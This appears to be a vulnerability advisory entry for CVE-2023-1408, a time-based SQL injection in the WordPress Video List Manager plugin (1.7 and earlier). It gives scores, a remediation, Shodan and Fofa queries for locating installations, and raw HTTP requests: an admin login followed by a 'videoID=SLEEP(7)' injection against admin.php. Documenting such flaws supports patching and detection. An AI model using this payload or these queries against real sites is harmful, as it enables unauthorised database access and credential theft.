| Title | Video List Manager <= 1.7 - SQL Injection |
|---|---|
| Author | r3Y3r53 |
| Severity | High |
| Impact | Authenticated high-privilege attackers (admin) can exploit SQL injection through the videoID parameter to extract database contents, potentially stealing user credentials, video metadata, and compromising the WordPress database. |
| Remediation | Update Video List Manager plugin to a version newer than 1.7 that uses parameterized queries or prepared statements for the videoID parameter in admin.php. |
| CVSS Score | 7.2 |
| EPSS Score | 0.20508 |
| CVE ID | CVE-2023-1408 |
| CWE ID | CWE-89 |
| Shodan Query | http.html:/wp-content/plugins/video-list-manager/ |
| Fofa Query | body=/wp-content/plugins/video-list-manager/ |
| Tags | time-based-sqli cve cve2023 wpscan sqli wordpress wp-plugin wp authenticated video_list_manager_project vuln |
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.
POST /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/15.0
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
log=9ovhk0&pwd=Pbrb8L&wp-submit=Log+In
GET /wp-admin/admin.php?page=tnt_video_edit_page&videoID=SLEEP(7) HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-1408.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-1408.pcap
N/AN/A